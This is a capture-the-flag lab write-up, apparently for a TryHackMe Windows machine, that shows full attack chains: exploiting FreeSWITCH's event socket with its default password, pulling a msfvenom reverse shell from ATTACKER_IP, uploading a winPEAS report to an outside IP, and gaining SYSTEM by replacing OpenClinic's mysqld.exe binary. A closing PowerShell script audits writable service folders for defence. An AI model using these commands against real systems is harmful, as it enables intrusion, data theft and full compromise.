Let's add the target IP to the hosts file, /etc/hosts:
sudo nano /etc/hosts
# Add the IP
MACHINE_IP target.local
This machine takes some time to boot up, be patient; it took me around 20 mins to figure out it won't respond to ping.
Enumeration
"I will hunt you down"
Let's start by scanning the machine with Nmap. Since it does not respond to ping, the usual host-discovery step is skipped (-Pn) and a TCP connect scan (-sT) is used instead of the default SYN scan.
nmap -sCVT -p- target.local -Pn
# This might be the following output from the scan
Nmap scan report for target.local
Host is up, received user-set (0.16s latency).
Scanned at 2023-02-03 21:26:36 IST for 363s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-02T15:35:32
| Not valid after: 2023-08-04T15:35:32
| MD5: b737fda0e13f6d7b23b9c899a285a3b4
| SHA-1: f9ebe7c6b75232a12fdcae9bcb2493b206016b0c
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2023-02-03T16:02:35+00:00
|_ssl-date: 2023-02-03T16:02:40+00:00; +1s from scanner time.
8021/tcp open freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
It's interesting that only two ports are open and everything else is filtered. One of them is 3389, running 'ms-wbt-server' (Microsoft Remote Desktop). A quick search for 'ms-wbt-server' yields a helpful Nmap script set that can be used to assess how exposed the service is.
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 target.local -Pn
# Here is the output for the nmap enumeration via the RDP script
PORT STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
|_ RDSTLS: SUCCESS
These scripts check which security layers the server accepts, test for the MS12-020 DoS vulnerability (without triggering it), and gather NTLM information such as the Windows version.
As for the RDP service, password spraying could be an option, but we have neither a username nor a password in this lab. Caution is warranted anyway: spraying passwords in a real environment without proper authorisation can lead to account lockouts.
Instead, let's look at the FreeSWITCH service on port 8021. FreeSWITCH is free, open-source server software for real-time communication applications such as WebRTC, video, and Voice over Internet Protocol (VoIP). It's versatile and runs on Linux, Windows, macOS, and FreeBSD.
Weaponization
"Lock and Load"
A quick search in msfconsole for FreeSWITCH turns up an interesting module. If you look at the module's options, you'll see that the default password it uses is 'ClueCon'. Now, let's try connecting to the service with netcat. Since the event socket is a plain-text, line-based protocol, this should work well enough.
msf> search freeswitch
# Search results might give you this particular result
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/misc/freeswitch_event_socket_cmd_exec 2019-11-03 excellent Yes FreeSWITCH Event Socket Command Execution
nc MACHINE_IP 8021
# Output
Content-Type: auth/request
ClueCon
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Hmm, something is not right; let's try telnet.
telnet target.local 8021
# Output
Trying 10.10.248.176...
Connected to target.local.
Escape character is '^]'.
Content-Type: auth/request
ClueCon
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Connection closed by foreign host.
Let's try something else and use searchsploit instead; the exploit script it provides is referred to as exp.py below.
# Generate a reverse shell with msfvenom
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=ATTACKER_IP LPORT=9999 -f exe -o reverse.exe
# Start the python webserver
python -m http.server 8080
# Deliver the exploit
python exp.py target.local 'curl http://ATTACKER_IP:8080/reverse.exe -o rev.exe'
# Start a Meterpreter session
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost ATTACKER_IP; set lport 9999; exploit"
# Finally, execute the payload on the target
python exp.py target.local 'rev.exe'
# You should be able to receive the session in msfconsole
# Switch to the shell
meterpreter> shell
Exploitation
"Access Granted"
Let's get the flag now.
C:\Users\Nekrotic\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users\Nekrotic\Desktop
09/11/2021 07:39 <DIR> .
09/11/2021 07:39 <DIR> ..
09/11/2021 07:39 38 root.txt
09/11/2021 07:39 38 user.txt
2 File(s) 76 bytes
2 Dir(s) 50,111,950,848 bytes free
# Get the flag
type user.txt
# Output
THM{64bca084_REDACTED}
Now we need to escalate privileges, otherwise we won't be able to read the root flag.
Let's deploy winPEAS (from PEASS-ng) for Windows.
# Deploy Peas-NG
cd C:\Users\Nekrotic
curl http://ATTACKER_IP:8080/winPEASany_ofs.exe -o win.exe
# Execute and make a report of the system
win.exe > report.txt
# Exfiltrate the report to get an overview of the system and what we are dealing with.
# We will use curl; it might take some time because of the file size.
curl --upload-file report.txt http://10.17.6.255:69
By the way, there is a 'projects' folder in the C: drive that you might want to check.
09/11/2021 07:18 <DIR> projects
# Upon closer inspection we can find
Directory of C:\projects\openclinic
09/11/2021 07:29 <DIR> .
09/11/2021 07:29 <DIR> ..
06/04/2021 22:14 250 configureCountry.bat
01/07/2021 17:20 167 configureLanguage.bat
09/11/2021 07:29 <DIR> jdk1.8
09/11/2021 07:18 334,840 lua5.1.dll
09/11/2021 07:19 <DIR> mariadb
07/06/2021 15:58 93,696 OpenClinic GA login.exe
08/05/2020 11:17 27,136 OpenClinicStartServices.exe
01/05/2021 23:45 316 stopOpenClinicHttp.bat
09/11/2021 07:30 <DIR> tomcat8
09/11/2021 07:29 <DIR> Uninstall
09/11/2021 07:18 1,389,568 uninstall.exe
7 File(s) 1,845,973 bytes
6 Dir(s) 50,207,125,504 bytes free
# The machine runs MariaDB as well; later on we could check the database for sensitive data if we want to.
Since we know OpenClinic is installed, we can search for exploits against it.
Privilege Escalation
"I am inevitable"
searchsploit openclinic
# Output
---------------------------------------------------- | ---------------------------------
Exploit Title                                        | Path
---------------------------------------------------- | ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation  | windows/local/50448.txt
---------------------------------------------------- | ---------------------------------
# Let's see what the exploit is all about
cat $(locate 50448.txt)
# Details
# By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.
# A low-privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace
# with a malicious file that would connect back to an attacking computer giving system-level privileges
# (nt authority\system) due to the service running as Local System.
# While a low-privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
# Any low-privileged user can elevate their privileges by abusing the MariaDB service:
Wooho!! Let's see if we can get root on this machine using the method described.
# Generate the payload first
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=6969 -f exe > mysqld_evil.exe
# Inside victim machine
cd C:\projects\openclinic\mariadb\bin
# Create a backup of original mysqld.exe
ren mysqld.exe mysqld.bak
# Deploy the payload
curl http://ATTACKER_IP:8080/mysqld_evil.exe -o mysqld.exe
# Start a netcat listener on your local machine
nc -lvnp 6969
# Restart the victim computer from the previous shell
powershell Restart-Computer
# Now wait for the magic to happen
After a few moments, you should receive the connection in your netcat listener.
C:\Windows\system32>whoami
whoami
nt authority\system
# We got root
# Get the Root Flag
type C:\Users\Nekrotic\Desktop\root.txt
# Output
THM{8c8bc5558f0f_REDACTED}
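The root cause above is a service binary folder that Authenticated Users can modify. The following PowerShell script is an added example (not part of the original writeup or of OpenClinic) that audits every installed service for this weakness and prints the icacls command that would remove the broad grant; the group list and the set of rights treated as "write" are my assumptions.

```powershell
# Added example: find Windows services whose executable folder grants write/modify
# rights to broad groups, the weakness the OpenClinic advisory describes.
# Run in an elevated PowerShell on the host under review.
$BroadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')  # assumption
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete'

function Get-ServiceExePath {
    param([string]$PathName)
    # Service paths may be quoted and carry arguments; keep only the executable.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Get-WritableServiceFolders {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $dir = Split-Path -Parent (Get-ServiceExePath $svc.PathName)
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
        $acl = Get-Acl -LiteralPath $dir
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadGroups -notcontains $ace.IdentityReference.Value) { continue }
            if ([int]($ace.FileSystemRights -band $WriteRights) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName   # 'LocalSystem' is the worst case
                StartMode = $svc.StartMode   # 'Auto' means a reboot runs a swapped binary
                Folder    = $dir
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

$findings = Get-WritableServiceFolders
$findings | Format-Table -AutoSize

# Suggested fix per folder: break inheritance (keeping a copy of the ACEs) and
# drop the broad grant so only administrators and SYSTEM can change the contents.
# Printed rather than executed so the commands can be reviewed first.
foreach ($f in $findings | Sort-Object Folder, Identity -Unique) {
    'icacls "{0}" /inheritance:d /remove:g "{1}" /T /C' -f $f.Folder, $f.Identity
}
```

Services running as LocalSystem with an Auto start mode in the output are the ones that reproduce the advisory's scenario exactly; after fixing the ACLs, also compare the binaries' hashes against the vendor's files to make sure nothing was already swapped.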
Thank you for reading my post, have a great rest of your day, and good hunting!